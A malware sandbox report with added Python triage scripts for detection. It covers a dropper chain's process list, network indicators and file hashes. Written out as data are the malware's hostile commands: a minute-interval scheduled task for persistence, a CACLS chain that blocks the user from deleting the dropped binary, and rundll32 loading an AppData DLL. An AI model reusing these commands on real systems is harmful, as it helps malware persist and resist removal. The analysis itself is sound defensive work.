C:\Users\Admin\AppData\Local\Temp\4C07.exe

C:\Users\Admin\AppData\Local\Temp\4C07.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {92A2F6A8-C127-430A-A4E9-978AF195ADBC} S-1-5-21-3750544865-3773649541-1858556521-1000:XOCYHKRS\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010205411.log C:\Windows\Logs\CBS\CbsPersist_20231010205411.cab
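The process list above is raw sandbox output. The script below is an added example, not part of the report or of any sandbox tooling: it runs a few triage rules over command lines copied from the Processes section and flags the patterns an analyst would pull out by hand: binaries executing from IXP###.TMP directories (the extraction folders IExpress self-extractors use, so a chain of them means a nested package), a scheduled task that re-runs a binary under AppData every minute, a CACLS chain that first removes the logged-on user's rights from the dropped file and folder and then grants read only, rundll32 loading a DLL from AppData, and AppLaunch.exe started with no arguments. The rule names, regexes and the choice of what to flag are the example's own; the command lines are copied verbatim from the report.

```python
"""Triage rules over the process command lines above.

Added example, not part of the sandbox report or of any sandbox tooling. The
entries in SAMPLE_CMDLINES are copied from the report's Processes section; the
rule names, regexes and the decision of what to flag are this example's own.
"""
import re

SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\file.exe"',
    r'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe',
    r'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"',
    r'C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 276',
    r'C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 132',
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe '
    r'/TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F',
    r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"'
    r'&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"'
    r'&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main',
    r'"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/',
]

IEXPRESS_TMP = re.compile(r'\\IXP\d{3}\.TMP\\', re.I)     # IExpress SFX extraction folder
USER_WRITABLE = re.compile(r'\\Users\\[^\\]+\\AppData\\', re.I)


def split_cmdline(cmdline):
    """Split a Windows command line into (exe, args), honouring a quoted exe path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end], cmdline[end + 1:].strip()
    exe, _, args = cmdline.partition(' ')
    return exe, args.strip()


def image_name(exe):
    """Lower-case file name of the exe, without any '.exe' suffix."""
    return re.sub(r'\.exe$', '', exe.rsplit('\\', 1)[-1].lower())


def rule_iexpress_chain(cmdline):
    """Binary running out of IXP###.TMP: one stage of a nested IExpress package."""
    exe, _ = split_cmdline(cmdline)
    return bool(IEXPRESS_TMP.search(exe))


def rule_minute_task_in_appdata(cmdline):
    """schtasks creating a task that re-runs a user-writable binary every minute."""
    exe, args = split_cmdline(cmdline)
    if image_name(exe) != 'schtasks':
        return False
    target = re.search(r'/TR\s+"?([^"]+)"?', args, re.I)
    every_minute = re.search(r'/SC\s+MINUTE\b', args, re.I)
    return bool(target and every_minute and USER_WRITABLE.search(target.group(1)))


def rule_cacls_deny_own_file(cmdline):
    """CACLS replacing a user's rights on a file or folder with none (":N"): the
    first half of the 'remove everything, then grant read only' lockdown."""
    exe, _ = split_cmdline(cmdline)
    if image_name(exe) not in ('cmd', 'cacls'):
        return False
    return bool(re.search(r'\bCACLS\b\s+"[^"]+"\s+/P\s+"[^":]+:N"', cmdline, re.I))


def rule_rundll32_appdata_dll(cmdline):
    """rundll32 calling an export of a DLL that lives under the user's AppData."""
    exe, args = split_cmdline(cmdline)
    return image_name(exe) == 'rundll32' and bool(USER_WRITABLE.search(args))


def rule_dotnet_host_without_args(cmdline):
    """AppLaunch.exe with no arguments does nothing useful by itself and is a
    frequent host process for an injected, unpacked payload."""
    exe, args = split_cmdline(cmdline)
    return image_name(exe) == 'applaunch' and args == ''


RULES = (rule_iexpress_chain, rule_minute_task_in_appdata, rule_cacls_deny_own_file,
         rule_rundll32_appdata_dll, rule_dotnet_host_without_args)


def triage(cmdlines):
    """Map each rule name to the command lines it fired on."""
    hits = {}
    for cmdline in cmdlines:
        for rule in RULES:
            if rule(cmdline):
                hits.setdefault(rule.__name__, []).append(cmdline)
    return hits


def crashed_pids(cmdlines):
    """PIDs that WerFault.exe was started to report on (-p <pid>)."""
    pids = []
    for cmdline in cmdlines:
        exe, args = split_cmdline(cmdline)
        match = re.search(r'-p\s+(\d+)', args)
        if image_name(exe) == 'werfault' and match:
            pids.append(int(match.group(1)))
    return pids


if __name__ == '__main__':
    for name, cmdlines in triage(SAMPLE_CMDLINES).items():
        print(name)
        for cmdline in cmdlines:
            print('    ' + cmdline)
    print('crashed PIDs:', crashed_pids(SAMPLE_CMDLINES))
```

The CACLS pattern deserves its own detection: setting the user's rights to none and then granting read only (/P "Admin:R" /E) leaves the dropped binary and its folder readable but not deletable by the logged-on user, which is what keeps the minute-interval task alive. crashed_pids() only pulls the -p argument from each WerFault.exe line; with PID-bearing process-creation telemetry it lets you tie each crash back to the process that died.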

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
RU 5.42.65.80:80 5.42.65.80 tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.35:443 facebook.com tcp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
CZ 157.240.30.35:443 fbsbx.com tcp
CZ 157.240.30.35:443 fbsbx.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
MD 176.123.9.142:37637 - tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
US 8.8.8.8:53 crls.pki.goog udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 crls.pki.goog udp
US 8.8.8.8:53 www.microsoft.com udp
NL 142.251.36.35:80 crls.pki.goog tcp
NL 142.251.36.35:80 crls.pki.goog tcp
US 172.67.34.170:443 pastebin.com tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
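The table above mixes the sample's own traffic with noise from the two Internet Explorer launches (accounts.google.com, facebook.com and their CDNs, plus certificate revocation list fetches from crls.pki.goog). The script below is an added example, not part of the report: it parses rows in the table's own format, keeps DNS lookups as a separate list of queried names, ignores ordinary hostname-based HTTPS, and flags what an analyst would pull into an IOC list: connections whose Domain column is empty or just repeats the IP (hard-coded hosts), non-standard ports, and the two third-party services loaders commonly use to learn the victim's public IP (api.ip.sb) or to fetch a C2 address from a paste (pastebin.com). The row subset, the port allowlist and the service list are the example's own choices; the table alone does not show what was fetched from those services.

```python
"""Triage of the Network table above.

Added example, not part of the sandbox report. NETWORK_ROWS is a subset of the
report's rows, copied as text; the port allowlist and the list of look-up /
paste services are this example's own choices, not anything the report states.
"""
import ipaddress

# Rows copied from the report's Network table (header included). The row for
# 176.123.9.142:37637 has an empty Domain column in the report as well.
NETWORK_ROWS = """\
Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 accounts.google.com udp
RU 5.42.65.80:80 5.42.65.80 tcp
NL 142.250.179.141:443 accounts.google.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
"""

STANDARD_PORTS = {53, 80, 443}          # example's own allowlist
# Public services that are benign by themselves but are routinely used by
# loaders and stealers to learn the victim's public IP or to fetch a C2
# address from a paste. Example's own list; the table does not show what
# was actually fetched.
LOOKUP_OR_PASTE_SERVICES = {'api.ip.sb', 'pastebin.com'}


def parse_rows(text):
    """Parse the report's space-separated table into dicts; tolerate an empty Domain."""
    rows = []
    for line in text.splitlines()[1:]:       # skip the header line
        parts = line.split()
        if not parts:
            continue
        if len(parts) == 3:                  # Country Destination Proto, no Domain
            country, dest, proto = parts
            domain = ''
        else:
            country, dest, domain, proto = parts
        ip, port = dest.rsplit(':', 1)
        rows.append({'country': country, 'ip': ip, 'port': int(port),
                     'domain': domain, 'proto': proto})
    return rows


def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def classify(row):
    """Return the list of reasons a row is interesting ([] for ordinary traffic)."""
    if row['proto'] == 'udp' and row['port'] == 53:
        return ['dns-lookup']                # resolver traffic: record the name, not the contact
    reasons = []
    if row['domain'] == '' or _is_ip(row['domain']):
        reasons.append('direct-to-ip')       # no hostname: hard-coded payload or C2 host
    if row['port'] not in STANDARD_PORTS:
        reasons.append('non-standard-port:%d' % row['port'])
    if row['domain'] in LOOKUP_OR_PASTE_SERVICES:
        reasons.append('lookup-or-paste-service')
    return reasons


def suspicious_destinations(rows):
    """Unique ip:port -> {domain, country, reasons, count}, for rows with a reason."""
    out = {}
    for row in rows:
        reasons = classify(row)
        if not reasons or reasons == ['dns-lookup']:
            continue
        key = '%s:%d' % (row['ip'], row['port'])
        entry = out.setdefault(key, {'domain': row['domain'], 'country': row['country'],
                                     'reasons': reasons, 'count': 0})
        entry['count'] += 1
    return out


def queried_names(rows):
    """Sorted unique hostnames the sample resolved via DNS."""
    return sorted({row['domain'] for row in rows if classify(row) == ['dns-lookup']})


if __name__ == '__main__':
    rows = parse_rows(NETWORK_ROWS)
    print('queried names:', ', '.join(queried_names(rows)))
    for dest, info in suspicious_destinations(rows).items():
        print('%-22s %-18s %s  x%d  %s' % (dest, info['domain'] or '-', info['country'],
                                          info['count'], ', '.join(info['reasons'])))
```

Repeat counts matter here: 77.91.68.29:80 shows up three times in the full table, which is the kind of plain-HTTP, direct-to-IP polling a loader does while waiting for tasks. Hostname-based HTTPS to the Google and Facebook ranges is dropped by the rules above because the browser launches in the Processes section account for it, not because it could never be relevant.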

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

MD5 b671eaf3ac451a0b31be2410a9ea5531
SHA1 a7b6d74a5e2d6b82c8c48c2de8c2bffc4dc20b0e
SHA256 a77d5f68052550912ad37e82bc67c3ea4b7a8c37bc637e91d2c7831861796ea0
SHA512 61de52376a9197fa31a095b1028431b6be5d9362cd57e772c93d6973001b84dd92b6004a6ad2b16d1aedcf8fb0a7b9fb73bff5be34ae27bbc1cd40e2eab34359

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

MD5 b671eaf3ac451a0b31be2410a9ea5531
SHA1 a7b6d74a5e2d6b82c8c48c2de8c2bffc4dc20b0e
SHA256 a77d5f68052550912ad37e82bc67c3ea4b7a8c37bc637e91d2c7831861796ea0
SHA512 61de52376a9197fa31a095b1028431b6be5d9362cd57e772c93d6973001b84dd92b6004a6ad2b16d1aedcf8fb0a7b9fb73bff5be34ae27bbc1cd40e2eab34359

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

memory/2688-23-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2688-25-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2688-27-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2688-28-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2688-29-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1220-34-0x0000000002C10000-0x0000000002C26000-memory.dmp

memory/2688-35-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\894C.exe

MD5 e5b41e4d3968f7a551375467bfa61ce5
SHA1 1c586f294bb35f3ebd526d9cb8360e9f81b728e0
SHA256 b524acb6b41d1e5ce707816496e1656ee94685a90b0b03435c1286ff3ae2a94b
SHA512 aad2e0d486fb168f57fb52a8f4b54bbf57f3a006091f7dbc4fc59e99b80b896cbfe81990027ef0a8547317ca283991f2be926151f8b7f5554771ebc0d5730f13

\Users\Admin\AppData\Local\Temp\894C.exe

MD5 e5b41e4d3968f7a551375467bfa61ce5
SHA1 1c586f294bb35f3ebd526d9cb8360e9f81b728e0
SHA256 b524acb6b41d1e5ce707816496e1656ee94685a90b0b03435c1286ff3ae2a94b
SHA512 aad2e0d486fb168f57fb52a8f4b54bbf57f3a006091f7dbc4fc59e99b80b896cbfe81990027ef0a8547317ca283991f2be926151f8b7f5554771ebc0d5730f13

C:\Users\Admin\AppData\Local\Temp\8AE2.exe

MD5 f1432a4597fa0744d496cbe8ebd50fd5
SHA1 99e96566aaee582913978531396110bc171101e5
SHA256 85f10bec21a78984acfed0f51a06e75b597b8a880f98e6e76af1438b3f5eef5f
SHA512 d6aed590959077a9fd5299a19ce3538cf943e8da260972d83f471b76e0a98b8570587171abc20fac7acddc44278be2248e9a79ec81435d03105b5949111ff438

\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

MD5 d05d23fdf50e490bc301d002d304efb5
SHA1 a873ecbd1267ede15f3d1a37cefc57f3af36f614
SHA256 61eec13eea4fd72c903991487e94abc4750ccb2d0a7eff9806bab70518bb4f2a
SHA512 0c47b2ceee392bb4f94690d9ebd45af7108ad59ea651e4f12c6526695055ea38489140a925db275b46779518ed436241b036038c8e3934b762fa78aec44bb30b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

MD5 d05d23fdf50e490bc301d002d304efb5
SHA1 a873ecbd1267ede15f3d1a37cefc57f3af36f614
SHA256 61eec13eea4fd72c903991487e94abc4750ccb2d0a7eff9806bab70518bb4f2a
SHA512 0c47b2ceee392bb4f94690d9ebd45af7108ad59ea651e4f12c6526695055ea38489140a925db275b46779518ed436241b036038c8e3934b762fa78aec44bb30b

\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

MD5 8ae472d9f76dffe0e5e4777a25b213a6
SHA1 4600844f6eed0b0da9d07f7f45ee3801f9997e49
SHA256 c5caa04a821f39d86a46d15d4b96b0c1a2a73de3d6a92b667b830c9c1d477ce1
SHA512 e11679e9a022a49a70f5f1f38ec80113615569a3ab65c629fac27259547bddbed1af770939f1d7a2cacf3a0a43f9120b1db399495e210358d865e550e4060cd1

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

MD5 8ae472d9f76dffe0e5e4777a25b213a6
SHA1 4600844f6eed0b0da9d07f7f45ee3801f9997e49
SHA256 c5caa04a821f39d86a46d15d4b96b0c1a2a73de3d6a92b667b830c9c1d477ce1
SHA512 e11679e9a022a49a70f5f1f38ec80113615569a3ab65c629fac27259547bddbed1af770939f1d7a2cacf3a0a43f9120b1db399495e210358d865e550e4060cd1

\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe

MD5 e5aeb294d397bbbb43d8ba695b49632f
SHA1 7f10ef983ec655727ac26be17bd0b27b2e516de5
SHA256 424f177cb32f62417381b3f6f62006bfde6136d6fbf0e442a188b42c898ceaa2
SHA512 92f519453a7e29a438884befc0e17b3f9d997fb9ba0c6f182bc03764c0ac8dd61e07537e4bd01499747e8257289e63480681d2ab980e37fd1c36bd13c013d6b6

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe

MD5 e5aeb294d397bbbb43d8ba695b49632f
SHA1 7f10ef983ec655727ac26be17bd0b27b2e516de5
SHA256 424f177cb32f62417381b3f6f62006bfde6136d6fbf0e442a188b42c898ceaa2
SHA512 92f519453a7e29a438884befc0e17b3f9d997fb9ba0c6f182bc03764c0ac8dd61e07537e4bd01499747e8257289e63480681d2ab980e37fd1c36bd13c013d6b6

C:\Users\Admin\AppData\Local\Temp\8DA1.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

\Users\Admin\AppData\Local\Temp\8AE2.exe

MD5 f1432a4597fa0744d496cbe8ebd50fd5
SHA1 99e96566aaee582913978531396110bc171101e5
SHA256 85f10bec21a78984acfed0f51a06e75b597b8a880f98e6e76af1438b3f5eef5f
SHA512 d6aed590959077a9fd5299a19ce3538cf943e8da260972d83f471b76e0a98b8570587171abc20fac7acddc44278be2248e9a79ec81435d03105b5949111ff438

\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe

MD5 081505ab58ebdecd989060fbd9330e99
SHA1 3ecf8b697aa12771c535d08728a8edf45cc05fa9
SHA256 6e828fa943119fe1836982e9a7e1a3728a0bc20fe9d33282d044acb0b2ced632
SHA512 775f782a500d67df4d5aae34e6f67d31010dc7a9d74ab36d901f4508f964c8d9f0dd9955aa8b39ae459d6e420c63628ac89efe747c6d0e17fb4ae66137131d59

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe

MD5 081505ab58ebdecd989060fbd9330e99
SHA1 3ecf8b697aa12771c535d08728a8edf45cc05fa9
SHA256 6e828fa943119fe1836982e9a7e1a3728a0bc20fe9d33282d044acb0b2ced632
SHA512 775f782a500d67df4d5aae34e6f67d31010dc7a9d74ab36d901f4508f964c8d9f0dd9955aa8b39ae459d6e420c63628ac89efe747c6d0e17fb4ae66137131d59

\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZO32QK3.exe

MD5 6bf588e59ed172b64884b5f3fcfca44a
SHA1 77cf14d4acd26a1806faa8391da5946f9aa59f0a
SHA256 8e52ae38fbb221d9a443f30626f1ae78ce5ed0d3d9bc99e88dacaf33624c1ac9
SHA512 94029ef036472398d086b6579d825fd54184f9441d98917280d2c6ab2f48c3c0d2d2bfaeea9434c85d9483c2c2010dc8195f10c134768b8966e6ddf5f11ea2cf

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZO32QK3.exe

MD5 6bf588e59ed172b64884b5f3fcfca44a
SHA1 77cf14d4acd26a1806faa8391da5946f9aa59f0a
SHA256 8e52ae38fbb221d9a443f30626f1ae78ce5ed0d3d9bc99e88dacaf33624c1ac9
SHA512 94029ef036472398d086b6579d825fd54184f9441d98917280d2c6ab2f48c3c0d2d2bfaeea9434c85d9483c2c2010dc8195f10c134768b8966e6ddf5f11ea2cf

C:\Users\Admin\AppData\Local\Temp\8ED7.tmp\8ED8.tmp\8EE9.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Temp\90AE.exe

MD5 a2d1606f98f0d7ce7fa75b407ba9c728
SHA1 f73ac048a37fc8ed09220253dd546016677ccb8f
SHA256 df05176ffe45af183d39c1513dbc2ea7161744e251ff50cccef74e79a49711a5
SHA512 1b51c5afdf5300253904bd599aee2883301d334ed10467bafcd507fd67bfed6dd20af85a1b63442269f038f7ff4f8d3469c0243c44c59b9605489d5e7a15431b

C:\Users\Admin\AppData\Local\Temp\A152.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

\Users\Admin\AppData\Local\Temp\90AE.exe

MD5 a2d1606f98f0d7ce7fa75b407ba9c728
SHA1 f73ac048a37fc8ed09220253dd546016677ccb8f
SHA256 df05176ffe45af183d39c1513dbc2ea7161744e251ff50cccef74e79a49711a5
SHA512 1b51c5afdf5300253904bd599aee2883301d334ed10467bafcd507fd67bfed6dd20af85a1b63442269f038f7ff4f8d3469c0243c44c59b9605489d5e7a15431b

C:\Users\Admin\AppData\Local\Temp\A568.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F0BBCCD1-67AE-11EE-8909-FAA3B8E0C052}.dat

MD5 e245eeb53a3867280b06b9893f66a6f5
SHA1 0250b6e60812f5b739abbad3da1978a2383d4ee1
SHA256 7f5de4350f544b3099d208ae07bb12d8bacfdc003a8acca59ff4825ebc4e30ad
SHA512 d7e7a0fd22613e6ec545281666f38080ba41e9a03584bc51d3e6d5aff3e50ef760c8fb9420beecf4433bf96b4eaa02af293be9bd37bde8ffee1dd149c119971c

\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/1976-186-0x00000000008D0000-0x00000000008DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabB4C1.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\TarBD4C.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d032f5665f5b845467e640e31b525eef
SHA1 5273838af3d93117de7040071a348af71c03552d
SHA256 6f7edd40cc736d1249bfcfa35288b1321f6743ecaca94a1167e9a7665fe237b0
SHA512 0331a04422c335d2a1682aa1888091737f37cfe032e9f302bc42ccc4ce0f98716f48b052bd8dc7996ac12564662d882eea4608e1979c62595ec469d2c0632831

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 37495208bfd1c98416d7c1334032e7cf
SHA1 1a64785adf61c468dd689c455b287777114facea
SHA256 dceaa36f106bd17bda057d238a58bb671f91d678d0a78bb88e62f23cc0808df8
SHA512 6e9fd0891dc1e556e77f34801af34d5c8270f6800136e814f81de725aa12cc3c629f14112268acdb469898b708e17996668542f8cad1d44ba31c89896f52573e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 91d0ebfd00f24d6f6da8728576f11f6f
SHA1 8bfb3a320c479bb3d317ea08a39235c7217f2488
SHA256 64a6c42488a614b8b3b105bec5cbbb15e73880c26d82a911cdeb298aff3d21be
SHA512 1953c9b8b346af0f7d0229b2c7cdd600fc8d27179d4bc4de4552e520be574cf266edb26d6fdae957e0dad33a336f29e3c0db1860f21f0867c444e6b220cecea3

memory/1976-310-0x000007FEF5740000-0x000007FEF612C000-memory.dmp

